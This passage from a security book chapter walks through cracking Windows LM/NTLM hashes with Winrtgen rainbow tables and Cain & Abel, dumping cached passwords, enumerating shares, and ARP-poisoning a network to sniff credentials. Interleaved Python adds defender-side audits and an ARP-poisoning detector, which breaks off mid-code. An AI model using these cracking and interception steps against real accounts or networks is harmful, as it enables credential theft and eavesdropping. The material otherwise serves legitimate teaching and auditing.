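    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse 'user:RID:LM hash:NT hash:::' lines (samdump2 / pwdump layout)."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError(f"malformed line: {line!r}")
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def build_table(words) -> dict:
    """Precompute NT hash -> password for a word list (a toy lookup table)."""
    return {nt_hash(w): w for w in words}


def audit(dump_text: str, table: dict) -> list:
    """Defender-side triage of a dump: which accounts still store an LM hash,
    which one is the built-in Administrator (RID 500, even when renamed) and
    whose NT hash is in the precomputed table."""
    return [{"user": r["user"],
             "builtin_admin": r["rid"] == 500,
             "lm_stored": r["lm"] not in ("", EMPTY_LM),
             "cracked": table.get(r["nt"])}
            for r in parse_pwdump(dump_text)]


# Constructed sample dump: Administrator carries the well-known LM and NT
# hashes of "password", Guest the empty-password hashes, and sportsguy
# (RID made up) the NT hash the chapter lists for lakers2009.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sportsguy:1006:aad3b435b51404eeaad3b435b51404ee:aa65f52cfc96b9b86b94ed8263639901:::
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_DUMP, build_table(["password", "february12", "lakers2009"])):
        print(finding)
```

The Administrator line uses the published LM and NT hashes of the password "password", the same values that appear truncated in the Ophcrack screenshot above, so the lookup finds it; Guest carries the empty-password hashes and is left alone. From the defender's side, any account whose lm_stored flag is true can be attacked through the much weaker LM path, which is the reason for disabling LM hash storage on systems that do not need it.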

There are different options for obtaining rainbow tables. You can create your own tables, 
download the tables via http or BitTorrent, or purchase them. The website http://tbhost.eu offers 
free downloads of rainbow tables. The rainbow tables can be downloaded via the following link: 
http://tbhost.eu/rt.php?algorithm-1. If you do not have the time (or bandwidth) to download a 
large amount of tables and have the money, the website http://www.freerainbowtables.com offers 
purchase of rainbow tables. 

Another option is to generate your own rainbow tables. The program Winrtgen will allow 
users to generate their own rainbow tables. With just a few clicks, Winrtgen users can create LM, 
NTLM, WPA-PSK, and other rainbow tables. Options for table character sets include uppercase 
and lowercase letters, numbers, bytes, special characters, or a mix of all of them. The benchmark 
button will provide an estimate of how long a specific table will take to generate. 

The following steps are needed to create your own rainbow tables: 


1. Download Winrtgen from oxid.it: http://www.oxid.it/downloads/winrtgen.zip. 

2. Unzip the file and double click on winrtgen.exe. 
Note: Even though winrtgen.exe may cause antivirus to fire off, it is not harmful to your 
system. It can be used to crack passwords, so some vendors classify it as a hacking tool. 

3. Click the Add Table button in the bottom left-hand pane of the Winrtgen program. 
4. For this example, use the LM hash type. The good news is that because the LM hash is 
broken up into two seven-character segments, a max length value of seven will find LM 
passwords of up to 14 characters. Notice that other hash set types can be selected 
from the drop down menu. There are several choices, including LM and NTLM. Keep in 
mind that Vista, 2008, and Windows 7 all require NTLM hash sets. The NTLM hash sets 
will often be significantly larger in size than the hash sets for LM and will take much more 
time to generate. 

5. Choose alpha for the character set. The following values are present when the user chooses 
alpha (all uppercase letters) in conjunction with the LM hash: 

— Key space of 8353082582 keys 

— Size of 610.35 MB (fits nicely on a CD) 

— Success rate of 97.80 % 

By clicking the Benchmark button, in the lower left-hand corner of the program, the following 
values are present: 

— Hash speed 

— Step speed 

— Table precomputation time 

— Total precomputation time 

— Max cryptanalysis 


The benchmark values will vary greatly depending on your RAM and processing power. 
Agencies that generate massive rainbow tables use cluster servers. 


[Screenshot: Winrtgen Rainbow Table properties for the LM hash with the alpha character set (ABCDEFGHIJKLMNOPQRSTUVWXYZ), max length 7, one table. Table properties: Key space 8353082582 keys; Disk space 610.35 MB; Success probability 0.978038 (97.80%). Benchmark: Hash speed 2356267 hash/sec; Step speed 1602564 step/sec; Table precomputation time 16.64 hours; Total precomputation time 16.64 hours; Max cryptanalysis time 1.79712 seconds] 


If the number two is entered in the number of tables, the success probability goes up to 99.85 % 
after clicking the Benchmark button. However, the total computation time doubles even though 
the success probability only goes up by 2.15 %. With the number of tables set to three, the success 
probability is 100 %, but the computation takes three times as long. For a rainbow table with 
uppercase letters and numbers, one table only gets you a 60.71 % success probability; in order to 
get to a success probability of 99.06 %, five tables have to be generated. 
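The figures Winrtgen reports can be reproduced from first principles. The following Python is an added example, not Winrtgen's or Cain's code, and the function names are mine: key_space() counts the candidate passwords for a character set over a length range, rt_file_size() gives the on-disk size of a RainbowCrack-format .rt table (16 bytes per chain: an 8-byte start point and an 8-byte end point), combined_success() and tables_needed() model n tables as independent trials, and lm_halves() shows why a max length of 7 is enough for LM. The independence model reproduces the chapter's alphanumeric figures (60.71 % for one table, 99.06 % for five) but is an upper bound for real tables, whose chains overlap, which is why the alpha figures above rise less than the model predicts.

```python
# Added example (not Winrtgen's or Cain's code): reproduce the table
# properties Winrtgen reports, from first principles.
import math

ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ALPHA_NUMERIC = ALPHA + "0123456789"


def key_space(charset: str, min_len: int, max_len: int) -> int:
    """Number of candidate passwords with min_len..max_len characters drawn
    from charset (Winrtgen's 'Key space')."""
    n = len(charset)
    return sum(n ** length for length in range(min_len, max_len + 1))


def rt_file_size(chain_count: int) -> int:
    """Bytes occupied by one RainbowCrack-format .rt file: each chain is
    stored as an 8-byte start point plus an 8-byte end point."""
    return chain_count * 16


def rt_file_size_mb(chain_count: int) -> float:
    """The same size in the MB (2**20 bytes) Winrtgen displays."""
    return round(rt_file_size(chain_count) / 2 ** 20, 2)


def combined_success(single_table_prob: float, n_tables: int) -> float:
    """Success probability of n tables whose coverage is modelled as
    independent.  Real tables overlap, so this is an upper bound."""
    return 1.0 - (1.0 - single_table_prob) ** n_tables


def tables_needed(single_table_prob: float, target: float) -> int:
    """Smallest number of tables whose combined (independent-model)
    success probability reaches target."""
    if not 0.0 < single_table_prob < 1.0 or not 0.0 < target < 1.0:
        raise ValueError("probabilities must be strictly between 0 and 1")
    if target <= single_table_prob:
        return 1
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - single_table_prob))


def lm_halves(password: str):
    """The two 7-character pieces LM actually hashes: the password is
    upper-cased, NUL-padded to 14 characters and split in half, so a table
    built for lengths 1..7 covers every LM password up to 14 characters.
    Windows stores no LM hash at all for longer passwords, hence None."""
    if len(password) > 14:
        return None
    padded = password.upper().ljust(14, "\0")
    return padded[:7].rstrip("\0"), padded[7:].rstrip("\0")


if __name__ == "__main__":
    print("alpha 1..7 key space:", key_space(ALPHA, 1, 7))
    print("alnum 1..7 key space:", key_space(ALPHA_NUMERIC, 1, 7))
    print("40,000,000 chains on disk:", rt_file_size_mb(40_000_000), "MB")
    print("5 alnum tables:", round(combined_success(0.6071, 5) * 100, 2), "%")
    print("tables for 99 % with p=0.6071:", tables_needed(0.6071, 0.99))
    print("LM halves of MEAELITEHACKER:", lm_halves("MEAELITEHACKER"))
```

The key spaces come out as 8353082582 (alpha) and 80603140212 (alphanumeric), matching the two Winrtgen screenshots; 40,000,000 chains of 16 bytes is 640,000,000 bytes, the 610.35 MB per table Winrtgen shows and the byte count Cain later reports reading. The LM split also explains the Cain output at the end of the chapter, where the second half of the 14-character password is recovered as a separate 7-character plaintext.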
[Screenshot: Winrtgen Rainbow Table properties for the LM hash with the alpha-numeric character set (ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789), max length 7, five tables. Table properties: Key space 80603140212 keys; Disk space 2.98 GB (610.35 MB each table). Benchmark: Hash speed 2258355 hash/sec; Step speed 1618122 step/sec; Table precomputation time 16.48 hours; Total precomputation time 3.43334 days; Max cryptanalysis time 8.89921 seconds] 

6. Clicking the Edit button will allow you to change the character set. You even have the ability 
to use different language sets. Once you have selected the hash, number of tables, and 
character set, click the OK button in the bottom right-hand corner of the Rainbow Tables 
Properties screen. Click Start at the Winrtgen v2.8 (Rainbow Tables Generator) by mao 
screen. The status column will indicate what percentage of the table is finished. 


[Screenshot: Winrtgen v2.8 (Rainbow Tables Generator) by mao main window, generating the table lm_alpha#1-7 with chain length 2400 and 40000000 chains; status 7200 of 40000000 (0.018%) done] 


7. Once the tables have been created, they can be used with a program such as Cain (www.oxid.it) 
to reveal passwords. The file(s) created will have an .rt extension. 


Cain & Abel 


Once you have generated your rainbow tables, you can use the Cain program to crack the 
passwords. While Cain is one of the best password cracking utilities on the market, the product 
only works on Microsoft Windows. Sorry, Mac and Linux users. Abel, the counterpart 
to Cain, is a small executable that will give an attacker unfettered access when it is installed 
on a victim machine. Cain & Abel is a free product and can be downloaded from the Italian 
website oxid.it at the following link: http://www.oxid.it/cain.html. The program requires the 
WinPcap driver, which allows the network card to run in promiscuous mode within Windows. 
It will automatically be installed for you at the end of the installation of Cain if it is not present 
on the system. 

In order to run the Cain program, you will need to disable your antivirus. Even though Cain 
is not a virus, it is detected as one because it has the ability to harvest passwords from the system. 
After Cain is installed on a Windows machine, a variety of passwords can be retrieved from the 
local system. The Cain program also includes network sniffer tools that will retrieve passwords 
from other systems. 

Open the Cain tool and click on the Cracker tab. The Cain program has the ability to crack a 
large number of passwords, including Microsoft, Cisco, Oracle, VNC, and Wireless. Right click 
in the window pane on the right side and select Add to list. 


[Screenshot: the Cain Cracker tab, listing the hash types it handles, each with 0 entries: LM & NTLM Hashes, NTLMv2 Hashes, MS-Cache Hashes, PWL files, Cisco IOS-MD5 Hashes, Cisco PIX-MD5 Hashes, APOP-MD5 Hashes, CRAM-MD5 Hashes, OSPF-MD5 Hashes, RIPv2-MD5 Hashes, VRRP-HMAC Hashes, VNC-3DES, MD2 Hashes, MD4 Hashes, MD5 Hashes, SHA-1 Hashes, SHA-2 Hashes, RIPEMD-160 Hashes, Kerb5 PreAuth Hashes, Radius Shared-Key Hashes, IKE-PSK Hashes, MSSQL Hashes, MySQL Hashes, Oracle Hashes, Oracle TNS Hashes, SIP Hashes, 802.11 Captures, WPA-PSK Hashes] 

Select the choice to "Import Hashes from local system." The second choice in the list allows 
you to import hashes from a text file. You can use this option when you dump the hashes from a 
local system using programs like pwdump and fgdump. Using the last option, import hashes from 
a SAM (security accounts manager) database, requires the SAM file and bootkey from the system 
file. Click Next. 
[Screenshot: the Cain "Add NT Hashes from" dialog with the options Import Hashes from local system (with an Include Password History Hashes checkbox), Import Hashes from a text file, and Import Hashes from a SAM database, and Cancel / Next buttons] 


All of the usernames from the local system will appear. If the password for the corresponding 
user is blank, Cain will report the password as *empty*. A red X next to the username field means 
that the password has yet to be revealed. Cain is capable of displaying both the LM and NT 
passwords for each user account. There are also columns for the LM and NT hashes that correspond 
to each password. 


[Screenshot: the Cain hash list with columns User Name, LM Password, < 8, NT Password, LM Hash, NT Hash. Guest and SUPPORT_388945a0 show * empty * passwords; Administrator, HelpAssistant, jesse, kim, and mason are marked with a red X because their passwords have not yet been revealed] 


There are several ways to crack the password for each user. If you do not have any rainbow 
tables, you can attempt to crack the password via brute force or dictionary attack. The brute force 
attack will just try every possible combination of characters until the password is found. For the 
dictionary attack to be effective, the user's password must be in your dictionary file. There is 
a small dictionary file called wordlist.txt that comes with Cain and Abel. It is located in the 
C:\Program Files\Cain\Wordlists directory. Feel free to add your own words to the wordlist or 
create a new dictionary file. A good attacker can use words that the victim is most likely to use. For 
instance, if the person who uses the computer is a huge basketball fan, you might want to include 
the words lakers, celtics, kobe, lebron, kingjames, jordan, and so on. These are the same techniques 
used by "good guys" to break the passwords of "bad guys." There are also plenty of websites where 
you can download dictionary files. One of my favorite websites to get word lists from is the Church 
of the Swimming Elephant. The word lists are available at http://www.cotse.com/tools/wordlists1.htm 
and http://www.cotse.com/tools/wordlists2.htm. 

To initiate a brute force attack, right click on the user account and select Brute-Force Attack. If 
you are conducting a brute force attack against a Windows XP, NT, 2000, or 2003 system, select 
LM Hashes. If you are conducting the attack against a machine running Vista, Windows 7, or 
Windows 2008, select NTLM Hashes. 
[Screenshot: the Cain right-click attack menu (Dictionary Attack, Brute-Force Attack, Cryptanalysis Attack, Rainbowcrack-Online, ActiveSync) with the submenu entries LM Hashes, LM Hashes + challenge, NTLM Hashes, NTLM Hashes + challenge, NTLM Session Security Hashes] 


After selecting the type of hash, the Cain program will display the Brute-Force Attack screen. 
At this screen, the user can choose from a list of predefined character sets or create their own 
custom character set. The predefined character sets include uppercase, lowercase, numbers, and 
special characters. The more extensive the character set is, the longer it will take the brute force 
attack to work. In this case, I am selecting the default option because I know the password for 
this account is all uppercase characters. Click Start to begin the attack. In this case, the plain text 
password of KIM was revealed in less than a second. A brute force attack is effective when you 
have ample time at your disposal or when the user has an extremely simple password. 


[Screenshot: the Cain Brute-Force Attack window. Plaintext of AAD3B435B51404EE is (empty); Plaintext of D7D776BDCC666FB2 is KIM; Attack stopped! 2 of 2 hashes cracked] 


For demonstration purposes, add a user to the local system with a password that is in the 
default wordlist included with Cain. Open a command prompt on the local system and type the 
following command to add a user called hacker with the password of whitsun: 

net user hacker whitsun /add 


[Screenshot: C:\WINDOWS\system32\cmd.exe running net user hacker whitsun /add; The command completed successfully.] 


Right click in the right-hand window in Cain, and select Remove All to remove all local accounts 
from the list. Click Yes to the question "Delete all entries?" Right click on the right 
pane again in Cain and select Add to list, then click Next. Your new user hacker should appear in the 
list. Right click on the user hacker and select Dictionary Attack. If you are conducting a dictionary 
attack against a Windows XP, NT, 2000, or 2003 system, select LM Hashes. If you are conducting 
the attack against a machine running Vista, Windows 7, or Windows 2008, select NTLM Hashes. 
In the Dictionary Attack window pane, right click and select Add to list. Browse to C:\Program 
Files\Cain\Wordlists and double click on Wordlist.txt. Click the Start button. 


[Screenshot: the Cain Dictionary Attack window with C:\Program Files\Cain\Wordlists\Wordlist.txt loaded. Options: As Is (Password); Reverse (PASSWORD - DROWSSAP); Double (Pass - PassPass); Lowercase (PASSWORD - password); Uppercase (Password - PASSWORD); Num. sub. perms (Pass,P4ss,Pa5s,...P45s...P455); Case perms (Pass,pAss,paSs,...PaSs...PASS); Two numbers Hybrid Brute (Pass0...Pass99). Result: Plaintext of AAD3B435B51404EE is (empty); Plaintext of ABEC732708AF4AEC is WHITSUN; Attack stopped! 2 of 2 hashes cracked] 
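The options in the Dictionary Attack window are what turn a short word list into a much larger candidate set. The following Python is an added example, not Cain's code, that turns those options around for the defender: given a proposed password and a word list, it undoes each transformation (the trailing digits of the two-number hybrid, reversal, doubling, case, and the common digit-for-letter substitutions) and checks whether what remains is a dictionary word. It treats every combination of the options as reachable, which is a conservative superset of what Cain actually tries, so a True result is a reason to reject the password. The word list, the substitution table and the function names are constructed for this example.

```python
# Added example, not Cain's code: a defender-side check that asks whether a
# proposed password is within reach of a dictionary attack run with the
# mangling options Cain offers.  Rather than generating every mangled
# candidate, it undoes the transformations and looks the result up.
import itertools

# Constructed mini word list; a real check would load a file such as
# Cain's wordlist.txt or one of the Church of the Swimming Elephant lists.
WORDLIST = {"whitsun", "ramonda", "lakers", "password", "kobe", "jordan"}

# Digit/symbol-for-letter substitutions behind the "Num. sub. perms" option.
LEET = {"4": "a", "@": "a", "3": "e", "1": "i", "!": "i",
        "0": "o", "5": "s", "$": "s", "7": "t"}


def _unleet_variants(word: str) -> set:
    """Every way of reading substituted characters back as letters,
    e.g. 'p4ss' -> {'p4ss', 'pass'}.  At most 10 positions are considered
    so the variant set stays bounded (2**10)."""
    positions = [i for i, ch in enumerate(word) if ch in LEET][:10]
    variants = set()
    for k in range(len(positions) + 1):
        for subset in itertools.combinations(positions, k):
            chars = list(word)
            for i in subset:
                chars[i] = LEET[word[i]]
            variants.add("".join(chars))
    return variants


def _bases(password: str) -> set:
    """Words from which password could have been built by Cain's rules.
    Case is ignored because Cain tries lowercase, uppercase and case
    permutations of every word."""
    forms = {password.lower()}
    # Two numbers Hybrid Brute appends 0..99: strip one or two trailing digits.
    for form in list(forms):
        for n in (1, 2):
            if len(form) > n and form[-n:].isdigit():
                forms.add(form[:-n])
    # Reverse: the word may have been spelled backwards.
    forms |= {f[::-1] for f in forms}
    # Double: the word may have been concatenated with itself.
    for form in list(forms):
        half = len(form) // 2
        if half and form[:half] == form[half:]:
            forms.add(form[:half])
    # Num. sub. perms: undo digit-for-letter substitutions.
    expanded = set()
    for form in forms:
        expanded |= _unleet_variants(form)
    return expanded


def dictionary_reachable(password: str, wordlist=WORDLIST) -> bool:
    """True if a dictionary attack with Cain's options would produce this
    password from wordlist (a conservative superset of what Cain combines)."""
    words = {w.lower() for w in wordlist}
    return any(base in words for base in _bases(password))


if __name__ == "__main__":
    for candidate in ["whitsun", "drowssap12", "k0be99", "kobekobe", "zx9!qv"]:
        print(f"{candidate:12s} reachable: {dictionary_reachable(candidate)}")
```

Run against the constructed list, whitsun (the chapter's own example), drowssap12 (password reversed with two digits appended), k0be99 and kobekobe all come back reachable, while a string with no dictionary base does not. The same check, fed a real word list, is a cheap addition to a password-change filter.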


In this example, we will use one of the wordlists from the Church of the Swimming Elephant. 
Use the following link to get a large word list of female names: http://www.cotse.com/wordlists/n_female. 
Highlight from the starting point of # "Names of women from lots of languages" and hold down 
the Shift button. Scroll to the end of the webpage, where it states the name zuzana. Right click 
and select Copy. Open a blank Notepad (not Wordpad) document and paste all of the text into 
the file. Save the file on your desktop as "Women." 

For demonstration purposes, add a user to the local system with a password that is in the custom 
word list from the Church of the Swimming Elephant. Open a command prompt on the local 
system and type the following command to add a user called hax0r with the password of ramonda: 
net user hax0r ramonda /add 


[Screenshot: C:\WINDOWS\system32\cmd.exe running c:\>net user hax0r ramonda /add; The command completed successfully.] 


Right click in the right-hand window in Cain, and select Remove All to remove all local accounts 
from the list. Click Yes to the question "Delete all entries?" Right click on the 
right pane again in Cain and select Add to list, then click Next. Your new user hax0r should appear 
in the list. Right click on the user hax0r and select Dictionary Attack. If you are conducting a 
dictionary attack against a Windows XP, NT, 2000, or 2003 system, select LM Hashes. If you 
are conducting the attack against a machine running Vista, Windows 7, or Windows 2008, select 
NTLM Hashes. In the Dictionary Attack window pane, right click on 
C:\Program Files\Cain\Wordlists\Wordlist.txt and click Remove All. Click Yes to the warning message box. 
In the Dictionary Attack window pane, right click and select Add to list. Browse to the Notepad file 
you created on your desktop called Women. Click the Start button. 


[Screenshot: the Cain Dictionary Attack window with the Women file from C:\Documents and Settings\Administrator\Desktop loaded and the same options as before (As Is, Reverse, Double, Lowercase, Uppercase, Num. sub. perms, Case perms, Two numbers Hybrid Brute). Result: Plaintext of AAD3B435B51404EE is (empty); Plaintext of F1E36CA07764807D is RAMONDA; Attack stopped! 2 of 2 hashes cracked] 


Using the Cain program with rainbow tables that were created using Winrtgen (or some other 
program) is an extremely effective way to crack passwords. A copy of Winrtgen is provided for 
users in the C:\Program Files\Winrtgen folder when Cain is installed. Rainbow tables can take 
hours, days, or even years to create depending on items like the character set you are using and the 
processing power of your machine. We will now demonstrate how to use the rainbow table created 
earlier in this chapter to crack a password. 

The rainbow table created in the example only had capital letters within the character set. For 
demonstration purposes, we will create a user with a 14-character password and see how long the 
password takes to be revealed. Open a command prompt, and type the following command: 
net user elitehax0r MEAELITEHACKER /add 


[Screenshot: cmd.exe running net user elitehax0r MEAELITEHACKER /add; The command completed successfully.] 


Right click in the right-hand window in Cain, and select Remove All to remove all local 
accounts from the list. Click Yes to the question "Delete all entries?" Right click 
on the right pane again in Cain and select Add to list, then click Next. Your new user elitehax0r 
should appear in the list. Right click on the user elitehax0r, select Cryptanalysis Attack, select 
the hash type, and select via RainbowTables (RainbowCrack). If you are on a Windows XP, NT, 
2000, or 2003 system, select LM Hashes. If you are on a Vista, Windows 7, or Windows 2008 
system, select NTLM Hashes. 


[Screenshot: Cain Cracker context menu on the hash list (LM and NT hash columns, the empty LM half AAD3B435B514... visible): Cryptanalysis Attack > LM Hashes, LM Hashes + challenge, HALFLM Hashes + challenge, NTLM Hashes, NTLM Hashes + challenge > via RainbowTables (OphCrack), via RainbowTables (RainbowCrack), via FastLM Rainbow Tables (Winrtgen)]


Click Add Table and browse to the location of the rainbow table created earlier in the chapter. 
Click Start and relax while the passwords are cracked. The hash must be covered by the rainbow table 
for the password to be recovered. In this example the password MEAELITEHACKER is 
found in less than 23 seconds. 
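As an added example (not code from the book or from Cain), this Python audit reads pwdump-style hash lines and reports which accounts still carry an LM hash, which is what makes the rainbow-table attack above possible. The sample dump and its non-constant hex values are constructed; only the empty-half and empty-NT constants are real.

```python
"""Audit Windows account hashes for the LM weakness a rainbow table exploits.

Input lines use the pwdump layout  user:RID:LM_hash:NT_hash:::  which carries
the same LM and NT columns that Cain's Cracker tab displays.
"""
from typing import Dict, List, Tuple

EMPTY_LM_HALF = "AAD3B435B51404EE"                 # LM hash of an empty 7-char half
EMPTY_LM = EMPTY_LM_HALF * 2                       # no LM hash stored at all
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"      # NT hash of the empty password


def classify_lm(lm_hex: str) -> str:
    """Describe what an LM hash gives away before any cracking is done."""
    lm = lm_hex.upper()
    if len(lm) != 32 or any(c not in "0123456789ABCDEF" for c in lm):
        raise ValueError(f"bad LM hash: {lm_hex!r}")
    if lm == EMPTY_LM:
        return "none"   # LM storage disabled, or password longer than 14 chars
    if lm[16:] == EMPTY_LM_HALF:
        return "short"  # password is at most 7 chars: only one half to crack
    return "split"      # two independent 7-char halves to crack


def parse_pwdump_line(line: str) -> Tuple[str, str, str]:
    """Return (user, lm_hash, nt_hash) from one pwdump-style line."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"malformed line: {line!r}")
    return parts[0], parts[2], parts[3]


def audit(lines: List[str]) -> Dict[str, List[str]]:
    """Map each account to the findings a defender should act on."""
    report: Dict[str, List[str]] = {}
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # skip blanks and comments
        user, lm, nt = parse_pwdump_line(line)
        findings: List[str] = []
        kind = classify_lm(lm)
        if kind == "split":
            findings.append("LM hash stored: 14-char password reduces to two 7-char searches")
        elif kind == "short":
            findings.append("LM hash stored: password is 7 chars or fewer (only one half to crack)")
        if nt.upper() == EMPTY_NT:
            findings.append("empty password")
        report[user] = findings
    return report


# Constructed sample dump. The second LM half of elitehaxor (EHACKER) and the
# first half of ramonda (RAMONDA) are the values shown in the chapter; every
# other hash value and RID here is made up.
SAMPLE_DUMP = """
# user:RID:LM:NT:::
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:11223344556677889900112233445566:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
elitehaxor:1005:0123456789ABCDEF257AE5FA0832374F:FEDCBA9876543210FEDCBA9876543210:::
ramonda:1006:F1E36CA07764807DAAD3B435B51404EE:0011223344556677889900AABBCCDDEE:::
""".strip().splitlines()

if __name__ == "__main__":
    for user, findings in audit(SAMPLE_DUMP).items():
        print(user, findings or ["ok"])
```

An account whose LM column is the doubled AAD3B435B51404EE constant gives the rainbow table nothing to work on; that is the state to aim for on every account.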


[Screenshot: LM Hashes cryptanalysis dialog. Sorted Rainbow Tables: lm_alpha. Statistics: Plaintext found 2 of 2 (100.00%), Total chain walk step 2561536, Total disk access time 14.49 s, Total false alarms 12888, Total false alarm step 17189497. Log: Reading lm_alpha#1-7_0_ ... oxid#000.rt ... 640000000 bytes read; Plaintext of 257ae5fa0832374f is EHACKER; Cryptanalysis time: 22.95 s. Result: Username elitehaxor, Password MEAELITEHACKER]


Obtaining Windows Passwords 63 


The first tab in the Cain program, Decoders, will allow you to retrieve a variety of cached 
passwords, including wireless passwords, Internet Explorer passwords, and passwords for Windows 
mail programs. 


To reveal passwords on the local system, click on the password type you are trying to find, 
such as Wireless Passwords, and click the blue plus button above the word Sniffer. If any such 
cached passwords exist on the system, they will be revealed to you in the Windows pane under 
the Password column. 


[Screenshot: Cain Decoders tab, Cached Passwords list: Protected Storage (showing an Outlook Express account and the Outlook Express Identity entry), IE7 Passwords, Windows Mail Passwords, Dialup Passwords, Edit Boxes, Enterprise Manager, Credential Manager]


The passwords can be exported to a text file by right clicking on the password and selecting 
Export. The Cain program will include all of the details about the account, including username, 
password, and account type. 


[Screenshot: exported file pass in Notepad: Cain's Protected Storage Password Manager; Resource: mail.jessel.net; Username: jesse; Password: IsthisMYrealPASSWORD; Type: Outlook Express POP3 Account; Identity: Main Identity]


If your machine is connected to a network, you can use the Cain program to enumerate all 
kinds of information about the other computers on the network. The Cain tool allows the user to 
find Microsoft Windows computers, Apple file servers, Novell servers, dial-in servers, SQL servers, 
domain controllers, print servers, terminal servers, and time servers. 
[Screenshot: Cain Network tab tree: Entire Network > Microsoft Windows Network > All Computers, Apple File Servers, Browsers, Dial-In Servers, Domain Controllers, Novell Servers, Printer Servers, SQL Servers, Terminal Servers, Time Servers; Quick List]


Although current Windows operating systems are more locked down than they have been 
in the past, you can still use the Cain program to reveal information about older machines (and 
some newer ones) on the network, such as open shares and the services that the remote computer is 
running. Newer operating systems such as Server 2008 and Vista are "very locked down" by default. 
Without the username and password to the local machine, it is unlikely that you will get 
information about users, groups, shares, or the registry. On older operating systems like Windows 2000, it 
may be possible to enumerate information about users, groups, shares, or the registry. 


[Screenshot: Cain Network tab showing shares enumerated from a WORKGROUP host: IPC$ (Remote IPC), ADMIN$ (Remote Admin, C:\WINNT), C$ (Default share, C:\), each with Unlimited as the user limit]


The Network tab of Cain can be used as a tool for auditing your internal network. Without 
using the username or password, see how much data you are able to harvest from remote systems. 
In some cases, you will still be able to get a sufficient amount of information without providing a 
username or password. 

If you have the username and password to the remote system, you can use the Cain program 
to connect to the remote system. Right click on the machine in the list you would like to connect 
to and choose "Connect as." If you do not have the password to the remote system, you may be 
able to find it through the Sniffer tab or through other methods discussed within this book. The 
good news from a hacking standpoint is that there is no limit to the number of attempts you can 
make as the administrator account. This, of course, is bad news from a security standpoint. 


[Screenshot: Cain "Connect as" dialog: Credentials required]

The Sniffer tab of Cain can wreak a lot of havoc on a network. Cain's sniffer is an extremely 
powerful tool that can be used to perform man-in-the-middle attacks. A man-in-the-middle attack 
is when a computer gets between two computers that are having a conversation. Plain-text 
passwords can be stolen if a system gets between your computer and the computer you are 
communicating with. Even worse, encrypted sessions can be hijacked and all traffic can be revealed in plain 
text to the attacker. Using the ARP poisoning feature of Cain, I was able to get usernames and 
passwords from both encrypted and unencrypted sessions. 

To capture plain text data in transmission using Cain, perform the following steps: 


1. Click on the Sniffer tab, and select Configure from the Cain menu bar. Select the interface 
(network card) with the correct Internet protocol (IP) address and click the Apply button. 


[Screenshot: Cain Configuration dialog. Sniffer tab: adapter \Device\NPF_{32299EF3-8007-423F-BA34-122D181990E7}, WinPcap version 4.1.0.1452, warning "Only ethernet adapters supported", options Start Sniffer on startup, Don't use Promiscuous mode, Start APR on startup. APR (Arp Poison Routing) tab: Use Spoofed IP and MAC addresses (IP 255.255.255.255, MAC 001122334455); Pre-Poisoning: Pre-Poison ARP caches (Create ARP entries); Poisoning: Poison remote ARP caches every 30 seconds, Use ARP Reply Packets or Use ARP Request Packets (More Network Traffic)]
3. Select both the green network icon and yellow ARP poison routing icon next to the folder 
in the menu bar. 




4. Verify that the Hosts tab is selected in the lower left-hand corner of the Sniffer tab. Click the 
blue plus sign above the word "Sniffer" and the OK button to scan all of the MAC addresses 
on the network. The list will be populated with MAC addresses and their corresponding IP 
addresses. 


[Screenshot: Cain toolbar (Decoders, Network, Sniffer, Cracker, Traceroute, CCDU, Wireless, Query) and the MAC Address Scanner dialog: Promiscuous-Mode Scanner options ARP Test (Broadcast 31-bit), ARP Test (Broadcast 16-bit), ARP Test (Multicast group 1), ARP Test (Multicast group 3), All Tests]


5. In the bottom left of the Sniffer menu bar, select the Password tab (fourth from the right). 
Click on the various fields, such as FTP and HTTP, to view various IP addresses, user- 
names, passwords, hashes, and URLs that people on the network are using. 


[Screenshot: Cain Sniffer tab, Passwords pane: an FTP entry with Timestamp, FTP server, Client and Username (anonymous) columns; lower tabs Hosts, APR, Routing, Passwords; http://www.oxid.it]
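One way a defender can notice the ARP poisoning the steps above set up, as an added example that is not part of the book or of Cain: watch the ARP replies on the segment for an address whose MAC changes and for one MAC that answers for several addresses at once. The trace layout, the poisoning MAC and the timestamps are constructed for this example; the gateway and client MACs are the ones visible in the chapter's screenshots.

```python
"""Detect APR-style ARP poisoning from a log of ARP replies."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed trace in a simplified "time reply sender_ip sender_mac" layout.
# 00:0c:29:aa:bb:cc is the made-up poisoning host; it answers for both the
# gateway and the client and repeats the claim every 30 seconds, as Cain's
# default re-poisoning interval does.
TRACE = """
15:13:00 reply 192.168.1.1 00:1f:90:19:78:e3
15:13:01 reply 192.168.1.6 00:0c:29:4d:6f:bc
15:13:02 reply 192.168.1.200 00:13:72:2f:87:62
15:13:30 reply 192.168.1.1 00:0c:29:aa:bb:cc
15:13:30 reply 192.168.1.6 00:0c:29:aa:bb:cc
15:14:00 reply 192.168.1.1 00:0c:29:aa:bb:cc
15:14:00 reply 192.168.1.6 00:0c:29:aa:bb:cc
""".strip().splitlines()

Reply = Tuple[str, str, str]  # (time, ip, mac)


def parse_trace(lines: List[str]) -> List[Reply]:
    """Return (time, ip, mac) for each ARP reply line; other lines are ignored."""
    out: List[Reply] = []
    for line in lines:
        f = line.split()
        if len(f) == 4 and f[1] == "reply":
            out.append((f[0], f[2], f[3].lower()))
    return out


def detect_poisoning(replies: List[Reply], gateway: str) -> List[str]:
    """Flag IP addresses that change MAC and MACs that claim several IPs.

    Alerts are plain strings so they can go straight into a log or SIEM.
    A change of the gateway's MAC is the case that hijacks all outbound
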